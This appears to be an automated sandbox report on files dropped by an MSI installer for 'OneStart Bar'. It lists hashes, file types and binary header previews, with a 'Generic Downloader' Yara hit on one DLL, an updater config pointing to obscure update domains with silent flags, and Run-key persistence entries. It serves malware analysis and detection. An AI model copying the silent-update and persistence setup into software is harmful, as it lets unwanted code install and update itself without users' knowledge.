                      Size (bytes):21696
                      Entropy (8bit):6.875690583921479
                      Encrypted:false
                      SSDEEP:
                      MD5:37E21B63959F243A157534133F85C5AF
                      SHA1:DFAD52A9990B2FAFCE7098CEBB174927E8E0BA00
                      SHA-256:4F6A14E4BA2A2B26B8B8433D5F82F75A96AF5A4F036D9447373B07271493917B
                      SHA-512:F59FAA6319FE2AFEBCCBD643E20C1EDB75DB74E9271354BD86DAC3BEA2CC59452EE024DC26B517AE88254A7C90DBE0E6C19A7B5AB3BFE9159D986D6C53CA5521
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............*... ...@....... ..............................#F....@.................................|*..O....@...................>...`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):22904
                      Entropy (8bit):6.8552351968066105
                      Encrypted:false
                      SSDEEP:
                      MD5:A5F541655A9EDC24F4B5184A40E40227
                      SHA1:90E196DCD76168F770ABE30098399BC5866ADF1B
                      SHA-256:B33D08149A756A401628D11BFDDFEEACA1F03C0578395BB061DAE44F8A12CE5D
                      SHA-512:C4D13E95114E232300B36ED7B7A72CE786F66D0F68B0ED9D54FEF788A831B39C893DAA3C2DE982B376A56A539C23E8F314CE8552ED7094E6826D5F70BFBE2D4B
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ...............................+....@.................................z+..O....@..x...............x?...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P*........................................s....*:.(......}....*2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21176
                      Entropy (8bit):6.950543834803339
                      Encrypted:false
                      SSDEEP:
                      MD5:415E3AB72F17F10D646B3E2C7A76F612
                      SHA1:ED25E94D4E88293345A0F28A5B975159C393B050
                      SHA-256:24DAA1FAEE0478BA58FEBE8EE789EB88BE0A14D350B57AD8B10690C55976B2E1
                      SHA-512:55B5C22B87F21DF89D0514AE05C9433B65A3C7532845FDFC4C2C5C5E2C3929D70143D84698FDB4DC13EC01895B1022CF0E5E76E12102739530B54150932A7B07
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................x.....@..................................)..O....@...................>...`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21712
                      Entropy (8bit):6.8884260737638385
                      Encrypted:false
                      SSDEEP:
                      MD5:328D12AF9613B0F3F25320B85DCCCBF4
                      SHA1:09D02B85A094E925AC3C5D8B1ACA096B730C160F
                      SHA-256:8957F0BCEA6AB8A011A53AE62466505199F11A228F87F3809931D974F87078CE
                      SHA-512:16569ECB727ADA36811E72FFC925F07AA21B8A627BE45F1EDA18CF2B759939591DCAFCB2D087596EE903C5ABFFAF19F56F25E9710EF22874C934CAD19537B798
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............*... ...@....... ..............................\.....@..................................*..O....@...................>...`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21712
                      Entropy (8bit):6.916807633540711
                      Encrypted:false
                      SSDEEP:
                      MD5:D9F02D9F7DA653F82E75112A2AB99CE6
                      SHA1:BBBB4C2C3911AE1F5BA7FAF1D632ED0F14D9B6AC
                      SHA-256:21493F7F615A099E795F7FAE7ECCE6082414D1D427790BDF4B103623A3AB34EB
                      SHA-512:DE5546FF103CCC6AA38E254039A372697A193F9C44D0A44F0BE3B242D9EEF63023DC3FD0C6E8E0D2363177F9230A4E7200D4C32591B398269A1CEE9BC47A99FC
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... ....................................@.................................L+..O....@..$................>...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):68096
                      Entropy (8bit):5.818047449027304
                      Encrypted:false
                      SSDEEP:
                      MD5:35FE0315D05DF3F4E877EA8114666356
                      SHA1:F0AD167601CDF9C334663585A19677F3A44E2126
                      SHA-256:04A1011BA50599FBD34FE0776E25A930F172287051C0520623BDF82533A90D52
                      SHA-512:C981D41357684086DFC3A479F3D52DAC68D47FF2DB1407E6A1C10175DADA15D79B9C49BDB6CB5FB642152BFECAAA4E6CD50531C2A4BEAFA7EA404AA6124E5C18
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jT............" ..0.................. ... ....... .......................`............`.................................;...O.... .......................@......\...T............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................o.......H........m..$.............................................................o(...*..o)...*:.(*.....}....*..{....*"..(....*"..(....*.s.........*..(*...*..(*...*"..(....*"..(....*.s ........*.....(+.....%-.&r...ps,...z(-...o....(%.....('....((...*..{....*"..}....*..{....*"..}....*N....)...s/...(0...*v..($....(&...s.....O...o1...*..%-.&r...ps,...z......(2......o....*..%-.&r...ps,...z......(2......o....*..%-.&r...ps,...z......(2......o....*..%-.&r...ps,...z......(2......o....*..%-.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):148480
                      Entropy (8bit):5.9698848168032015
                      Encrypted:false
                      SSDEEP:
                      MD5:1DB099283F367291F51A7D53D4A95A34
                      SHA1:6FBAF3FF0B05FF9A322081B9889F960A75889E8E
                      SHA-256:2DF4F0CFECF858F4C1415F26A06674163016D86BDA1BA9CF2B510722307143B1
                      SHA-512:4462581559D19A803E96245DD6018FB5B5717E1FD35D656204E5CDF46D36BD2F7C6E6E7C768A01D8887F95EAAF1A782C48ECBCCAB0EA1AABA1139DF976EF7E0A
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..:...........W... ...`....... ...............................*....`.................................1W..O....`..............................XV..T............................................ ............... ..H............text....9... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................eW......H............M...................U........................................(?...*..(?...*.*Z.(}...t....o"...t....*..(}...t.....t#...%-.&r...ps@...zo#...*Z.(}...t....o&...t....*..(}...t.....t#...%-.&rM..ps@...zo'...*Z.(}...t....o$...t....*..(}...t.....t#...%-.&r...ps@...zo%...*..(....*.0..y........(}...t.......!...sA...}.....(}...t....{.....(}...t....oB....<...(C...(D...r...poE....|....<...(C...(D...r...poE....}...*..(....*n.-.rM..ps@...z.s....o9...&*r.-.rM..ps@...z.s....o9...&
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):243576
                      Entropy (8bit):6.63219267320993
                      Encrypted:false
                      SSDEEP:
                      MD5:9AD549C121108B3B1408A30BEE325D08
                      SHA1:898FFC728087861E619DABABD8E65CC902276D06
                      SHA-256:263975E4F5AFC90E91F9F601080B92C9FBC5E471132F63AD01C6C4F99B33B83A
                      SHA-512:9A9005ACF2AF86D6A0A95773E968D98E90B7E71E8E71D58949FF51AAD49050DCA57D94A19671B1B5026BD74E7B627F31D0C8A50BB66AB740D629022C3A95D579
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.3...]X..]X..]X..\Y..]X...X..]X@.\Y..]X..\X..]X@.YY..]X@.^Y..]X@.XYA.]X@.]Y..]X@..X..]X@._Y..]XRich..]X................PE..L...=|.a.........."!.........x......p........0......................................?I....@A........................ ....K..<r..........................x#.......+...;..8............................<..@............p..8............................text............................... ..`.data....4...0...2... ..............@....idata..~....p.......R..............@..@.rsrc................d..............@..@.reloc...+.......,...h..............@..B................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):436600
                      Entropy (8bit):6.647435576141042
                      Encrypted:false
                      SSDEEP:
                      MD5:8FF1898897F3F4391803C7253366A87B
                      SHA1:9BDBEED8F75A892B6B630EF9E634667F4C620FA0
                      SHA-256:51398691FEEF7AE0A876B523AEC47C4A06D9A1EE62F1A0AEE27DE6D6191C68AD
                      SHA-512:CB071AD55BEAA541B5BAF1F7D5E145F2C26FBEE53E535E8C31B8F2B8DF4BF7723F7BEF214B670B2C3DE57A4A75711DD204A940A2158939AD72F551E32DA7AB03
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...>|.a.........."!.........~...............0............................................@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):21384
                      Entropy (8bit):6.470094803230791
                      Encrypted:false
                      SSDEEP:
                      MD5:C946A9E4170F6B16D25C822DA616DC6A
                      SHA1:F602D23DB756F9C3A058D3B7186D24480E05790F
                      SHA-256:65BDADB5562B9473471740B1DCD8B064459A40D71A1A11FC5AEDAA855FE7635A
                      SHA-512:916CAD8B1E38B2B15AB836844C5CC9D36B212831B2F553198054FE9CB5CD77AECD544CAC8040000337CEFDA9B15BF95E8903F36A9C1BEB7D579CFFF670445617
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(D.vl%.%l%.%l%.%.U.$n%.%e]/%h%.%>P.$f%.%>P.$m%.%l%.%D%.%>P.$i%.%>P.$x%.%>P.$m%.%>PC%m%.%>P.$m%.%Richl%.%........................PE..L...J|.a.........."!.........................0...............................p......#,....@A.........................*..J....@..x....P...............0...#...`..t...X...8...............................@............@...............................text...J........................... ..`.data...8....0....... ..............@....idata.......@......."..............@..@.rsrc........P.......(..............@..@.reloc..t....`.......,..............@..B........................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):166264
                      Entropy (8bit):6.800892494270331
                      Encrypted:false
                      SSDEEP:
                      MD5:06DEEA1786C951D3CC7E24A3E714FF03
                      SHA1:9906803CEDB8600C5E201AE080155BEEBD2902B2
                      SHA-256:EAC4C95CD7B013E110F2CF28C08342126FE1658EF16010541F05B234D23272DD
                      SHA-512:28CAA59DEEC92E417468BB0244DA2E60FAF6482EF608258E99FA47F59D3CD0EDEE69155E913034AC7B5E1AFC88DBF8F6F97058B75F0CBC6E4C045E1EE6EAADA0
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%>..a_a.a_a.a_a../`.c_a.h'.m_a.3*e.j_a.3*b.c_a.a_`.._a.3*`.d_a.3*d.r_a.3*a.`_a.3*..`_a.3*c.`_a.Richa_a.................PE..L...J|.a.........."!.....*...<......0........@......................................:.....@A.........................3..@....Q.......`...............f..x#...p..X....\..8............................\..@............P...............................text....).......*.................. ..`.data...(....@......................@....idata..`....P.......6..............@..@.rsrc........`.......D..............@..@.reloc..X....p.......H..............@..B................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):52104
                      Entropy (8bit):5.1488364199396335
                      Encrypted:false
                      SSDEEP:
                      MD5:FFB8C73E6E3769D5D8715E694707C792
                      SHA1:F7D63FA41C34D7B75CD70D72E317DB148F3D50CA
                      SHA-256:1DD7D3417FFFC321A67AAE2CA7E89A7D75203F8A3586CD829C56766F313F7931
                      SHA-512:61E83F71A388FD1176665225CC84C32FAC40663376629ADBE9B47CD9E69DDADC43FEC021B07062585AF80811E8F3E0479314B2277E6CB8617645FD304FAE88AB
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Uz.;).;).;)*.:(.;)...).;)..?(.;)..8(.;).:)..;)..:(.;)..>(.;)..;(.;)...).;)..9(.;)Rich.;)........PE..L...J|.a.........."!.....H..........PC.......`............................... ......,@....@A.........................Q..D...............0................#......x.......8...........................0...@............................................text....F.......H.................. ..`.data........`...B...L..............@....idata..............................@..@.rsrc...0...........................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):18816
                      Entropy (8bit):6.421430337596372
                      Encrypted:false
                      SSDEEP:
                      MD5:EF6C5EEB8B36D941E6991E6981CDB88A
                      SHA1:E21989951B745B290F143DD63F94BD4399A74284
                      SHA-256:3859B4A5A5C0A30CEE15C188F678E09D040541C221999D926955B49E8779E675
                      SHA-512:12CB0C4E4DE73600E262B6B6D0448FB050BD4B673D86265B4033B253EA3864DDA4F004F6344AAE5BED7A15D5717531F7B18374E47FF4258E027EE7B896F6F406
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Mt.T.............e.......mv.............[`......[`......[`......[`......[`......[`......[`......Rich....................PE..L...J|.a.........."!................P........0...............................p.......)....@A.........................!../...l@..P....P..0............&...#...`..H...D...8...............................@............@..h............................text............................... ..`.data........0......................@....idata..t....@......................@..@.rsrc...0....P......................@..@.reloc..H....`.......$..............@..B................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):98616
                      Entropy (8bit):5.627990537858435
                      Encrypted:false
                      SSDEEP:
                      MD5:0ADF6F32F4D14F9B0BE9AA94F7EFB279
                      SHA1:68E1AF02CDDD57B5581708984C2B4A35074982A3
                      SHA-256:8BE4A2270F8B2BEA40F33F79869FDCCA34E07BB764E63B81DED49D90D2B720DD
                      SHA-512:F81AC2895048333AC50E550D2B03E90003865F18058CE4A1DFBA9455A5BDA2485A2D31B0FDC77F6CBDFB1BB2E32D9F8AB81B3201D96D56E060E4A440719502D6
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll, Author: Joe Security
                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll, Author: Joe Security
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ..............................v.....@..................................U..O....`..,............B..8?........................................................... ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M...*.M...*.M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):903184
                      Entropy (8bit):6.422534936083721
                      Encrypted:false
                      SSDEEP:
                      MD5:48B789F7529C96B0283ACCC15785E7AB
                      SHA1:7D8526449160CC90B57437C80D7C99D64CC8F713
                      SHA-256:1578F898C74EAEF3E91BCE2B3B699034E75059387619BE3BACF7EE2773232270
                      SHA-512:D8A85B95478A50F5E46FE7DBCD6EC202217EC88EC32799D4C444FAFBD69F683E11FD6C61F7B851BAA73380E187F7DF6D3874759736FFBFD01C3A55B8ACDFDE1D
                      Malicious:true
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..Atz..tz..tz....[.zz....Y..z....X.iz..&...lz..&...Wz..&...8z..}.).rz..}.9.kz..tz...{.......z....U.uz......uz..Richtz..........................PE..L......\.........."...............................@.................................8A....@.................................,........p...................&...P..$.......p................... ...........@............................................text...o........................... ..`.rdata..............................@..@.data...d'...@.......*..............@....rsrc........p.......<..............@..@.reloc..$....P......................@..B........................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):448
                      Entropy (8bit):5.393161588507139
                      Encrypted:false
                      SSDEEP:
                      MD5:16B77BE8ADDDFE7305BE47B41A432839
                      SHA1:E192DA54B5570C2B7FE9AD3DDCC72DC2043A5393
                      SHA-256:9A7089446D672B8E76FBA8E8F3B8DE969BA99E9053D5073DA17A17BFD7374957
                      SHA-512:0A8F90CFB33203B6C3A65BD9A432B9E9EBC6506E528004BDFE8B770D9783F83468CADEE606A8A21CCBB60D0C60A818F41D7F3227762D992C9FD2D356394EE077
                      Malicious:false
                      Reputation:low
                      Preview:[General]..AppDir=C:\Users\user\AppData\Roaming\OneStart\bar\..ID={4CF3F912-D8D7-4F3B-AC2B-F452689891AC}..ApplicationName=OneStart Bar..CompanyName=OneStart.ai..ApplicationVersion=1.10.14.30800..DefaultCommandLine=/silentall -nofreqcheck..URL1=https://Av9fXr.com/api/dbar/updates.txt..CheckFrequency=2..DownloadsFolder=C:\Users\user\AppData\Roaming\\OneStart\.updates\..Flags=NoUpdaterInstallGUI..URL=https://j9vfy4.com/api/dbar/updates.txt..
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):267656
                      Entropy (8bit):6.547035182798101
                      Encrypted:false
                      SSDEEP:
                      MD5:2FB4C4168E379F13B15D4E299ECF3429
                      SHA1:4C6702254054F288BEB49ADCDD6317575E83374D
                      SHA-256:8CD7BE490AD502C9980CB47C9A7162AFCCC088D9A2159D3BBBCED23A9BCBDA7F
                      SHA-512:8BC80A720CDC38D58AB742D19317FBE7C36CFB0261BB9B3D5F3B366459B2801B95F8E71FB24D85B79F2C2BC43E7EB135DAB0B81953C7007A5C01494C9F584208
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hb.:...i...i...i.{.i...i^v.h...i^v.h...i^v.h...i^v.h...i.s.h...i...i...i^v.h...i^v.h...i^v.i...i^v.h...iRich...i................PE..L....~.a.........."!.........................0............................... ......Gp....@A........................@....=...............................#......TX..\J..8............................J..@............................................text...[........................... ..`.data....o...0...l..................@....idata..............................@..@.rsrc...............................@..@.reloc..TX.......Z..................@..B........................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):76168
                      Entropy (8bit):6.765544990184352
                      Encrypted:false
                      SSDEEP:
                      MD5:1A84957B6E681FCA057160CD04E26B27
                      SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                      SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                      SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...>|.a.........."!.........................................................@......{.....@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):226816
                      Entropy (8bit):5.805239882361139
                      Encrypted:false
                      SSDEEP:
                      MD5:E67544B112F568F13B17D72189FDA007
                      SHA1:B75B79C65330A77FE7AEA5EF6C319D7F3D1865D4
                      SHA-256:697F13F09CB2C425DDCFE1AA167D698F7AF5AEA48D03D5370143BC00E9BBFA2E
                      SHA-512:5A3381C0BE69DF8DC5A8C7C931B14919A189A8D03D2128D3848FBF73E3FD21631FE44ECCD9BAF97A15F646D0FCC5B3263B6EAC2F98D67557A07AD6FB4F91C402
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9!..........." ..0..j..........V.... ........... ...............................2....`.....................................O.......0...........................`...8............................................ ............... ..H............text...ti... ...j.................. ..`.rsrc...0............l..............@..@.reloc...............t..............@..B................6.......H.......0...............................................................J.("....~N...}....*&...(....*&...(....*:.(".....}....*R.("......s....}....*&...(....*..{....*2.{....o....*V.{....o....%-.&~#...*..{....*"..}....*&...(....*V.(".....}......}....*..{....*..{....*....0..#.........j-..*.s$.....(........,..o......*..................0..X.......s%.....o&...-..*..jo'......s(...... ....o)....o*....~......o+.....jo'........,..o......*......!.+L.......0.."........(......o*....o,....
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {2CE2B914-78AF-427B-8432-9E1112FB705D}, Number of Words: 10, Subject: OneStart Bar, Author: OneStart.ai, Name of Creating Application: Advanced Installer 15.8 build b14c769f44, Template: ;1033, Comments: This installer database contains the logic and data required to install OneStart Bar., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                      Category:dropped
                      Size (bytes):6721024
                      Entropy (8bit):7.872546454043731
                      Encrypted:false
                      SSDEEP:
                      MD5:4A3439907F9E8F17D354940F46FA0EDB
                      SHA1:D94178382C0FE6C8A59A6A6485CF4B44617C0796
                      SHA-256:0CDA9799E63F8CFAA06E6AA1A86323EE88C75C8D765B5FC15813E093C576C4F1
                      SHA-512:4906A85986BEB13EA981861C4EC0416C6220EE82B81E4D990831FFCE318730F2B0E2CEAEE053DC15954E851060D711132D4F657AC16AE2AEBA95A8F82A599C60
                      Malicious:false
                      Reputation:low
                      Preview:......................>...................g...................................|......................._...`...a...b...c...d...e...f...g...h................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q.......................................g...............=.......................................M....................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...<...4...5...6...7...8...9...:...;.......>...I...?...@...A...B...C...D...E...F...G...H...d...J...K...L...c...f...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e.......h...u...i...j...k...l...m...n...o...p...q...r...s...t...v...X...w...x...y...z...
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):165068
                      Entropy (8bit):5.908994034674469
                      Encrypted:false
                      SSDEEP:
                      MD5:54025434F0563927029BC80F30161D2E
                      SHA1:8D4BFDBCF7F1BB0A81D615B051205459237ACEF0
                      SHA-256:F704F7545037BC949B3578A7C5FE2DCE0DC2BD22171AE09F9CFA8A9748CA82F6
                      SHA-512:2351CFB5289955179BA08835BBDE0FF649BB5CFECCFF72DBE59FA319089B0EC2C08C75562B1EDD7BD91A0DBEA55D14C705651D765EC1D903D519742020BD4F91
                      Malicious:false
                      Reputation:low
                      Preview:...@IXOS.@.....@8..W.@.....@.....@.....@.....@.....@......&.{31F4B209-D4E1-41E0-A34F-35EFF7117AE8}..OneStart Bar..OneStartBarSetup.msi.@.....@.....@.....@......icon_OneStart2.exe..&.{2CE2B914-78AF-427B-8432-9E1112FB705D}.....@.....@.....@.....@.......@.....@.....@.......@......OneStart Bar......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{8064D080-8B31-4027-A1D4-2EFE744DD72D}T.C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll.@.......@.....@.....@......&.{D33FE035-BFCF-4952-91EA-C72C8255422A}C.01:\Software\Microsoft\Windows\CurrentVersion\Run\OneStartBarUpdate.@.......@.....@.....@......&.{AA0BFFD3-140A-470C-B1B1-A4889A10C752}H.C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dll.@.......@.....@.....@......&.{438E3D79-1801-4187-9FC8-D2F881C27033}=.01:\Software\Microsoft\Windows\CurrentVersion\Run\OneS
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Cannot read section info
                      Category:dropped
                      Size (bytes):20480
                      Entropy (8bit):1.166648081126449
                      Encrypted:false
                      SSDEEP:
                      MD5:B05D2B46D5DAE4F44689014C8123DBAF
                      SHA1:E23D82704564923079E27F697FAF93D188331985
                      SHA-256:7B2EE3E1F922498F733CEECEDEE9910237AE6F6F568316DE8FF74566FCEEDF16
                      SHA-512:19E7B5A091C52202E494390B2D8A5D092B9EB81645A1B62516D7EA97A3EBF09FE39C0518C5ABEA01C4DB96B53AC687C863F7E3A3C35FE5C4A04E1D8541CA90F5
                      Malicious:false
                      Reputation:low
                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):323399
                      Entropy (8bit):5.392662267929109
                      Encrypted:false
                      SSDEEP:
                      MD5:37088A8F0EE0299798824F249C939488
                      SHA1:216FBB7407AC41426971E7E3D23FFCFDC063DB30
                      SHA-256:7A1113534F9E2B820EBE768FAD7AD161573B0C80F1BA602D11B3219C464E6794
                      SHA-512:0FF2B427DC51F41F40ADE0070101AAAD29CB1443A7198E461912ECA4831EEA11F2F116FE843A97A1566257F973EA74BEBB4D8C6A1B1E99D00574C678FB14EB28
                      Malicious:false
                      Reputation:low
